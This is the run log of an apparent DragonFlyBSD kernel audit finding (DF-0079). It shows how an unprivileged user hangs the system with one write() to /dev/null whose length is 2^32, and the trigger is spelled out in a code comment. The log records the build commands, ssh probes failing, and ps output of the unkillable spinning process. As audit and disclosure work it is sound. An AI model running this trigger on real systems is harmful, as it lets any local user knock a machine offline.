DragonFlyBSD Kernel Audit
DF-0079 / run.log
← back to finding ↓ download raw
================================================================================
DF-0079 — decisive runtime demonstration (host-side timeline + serial proof)
Guest: DragonFly 6.5-DEVELOPMENT x86_64, 2 CPUs, maxx uid 1001 (not in wheel)
================================================================================

[1] Build (as maxx):
    $ cd poc/DF-0079 && cc -o df0079 df0079.c
    BUILD_EXIT=0
    -rwxr-xr-x 1 maxx maxx 9104 ... df0079

[2] Trigger (as UNPRIVILEGED maxx; /dev/null is mode 0666):
    maxx$ cd poc/DF-0079 && nohup ./df0079 > w.out 2>&1 < /dev/null &
    WEDGE_PID=889
    # ./df0079 does: fd=open("/dev/null",O_WRONLY); write(fd,(void*)0x1,0x100000000ULL);
    #                ^^^ iov_len = 2^32, low 32 bits == 0 -> u_int c truncates to 0
    #                    -> mmrw bookkeeping subtracts 0 -> while(uio_resid>0) spins forever

[3] Host-side ssh reachability timeline after trigger (probes every 1s):
    t= 1s  ssh=UNREACHABLE
    t= 2s  ssh=UNREACHABLE
    t= 3s  ssh=UNREACHABLE
    t= 4s  ssh=UNREACHABLE
    t= 6s  ssh=UNREACHABLE
    t= 8s  ssh=UNREACHABLE
    t=10s  ssh=UNREACHABLE
    => A SINGLE unprivileged write() rendered the guest unresponsive to ssh
       within 1 second. No panic (clean starvation). Only `vm.sh reset` recovers.

================================================================================
EARLIER DECISIVE RUN (richer capture; wedge landed on the non-network CPU so a
serial-console watcher survived long enough to snapshot the wedged thread).
Full per-iteration ps/top in serial_wedge_capture.txt. Key excerpt:
================================================================================
   PID   PPID STAT     UID %CPU      TIME UCOMM            COMMAND
   852      1 R0      1001  0.0   0:00.50 df0079           ./df0079     (t+0.0s)
   852      1 R0      1001  0.0   0:01.68 df0079           ./df0079     (t+0.7s)
   852      1 R0      1001  0.0   0:02.86 df0079           ./df0079     (t+1.4s)
   ...
   852      1 R0      1001  0.0   0:20.56 df0079           ./df0079     (t+19.5s)

  CPU states: 0.0% user, 0.0% nice, 50.0% system, 0.0% interrupt, 50.0% idle
  (2-CPU guest: one core fully in kernel `sys` = the wedged mmrw loop.)

INTERPRETATION:
  - STAT R0          : thread Running on CPU (not blocked/sleeping) -> spinning.
  - UID 1001         : triggered by UNPRIVILEGED user maxx.
  - TIME grows ~1.18s per ~1.0s wall  -> 100% of one CPU, indefinitely.
  - residual never drains (c=0 truncation) -> the write() NEVER returns.
  - process is unkillable (no signal-check point in the tight kernel loop);
    only a hard reset recovers the guest.

VERDICT: REPRODUCED. Trivial unprivileged full-system/local DoS.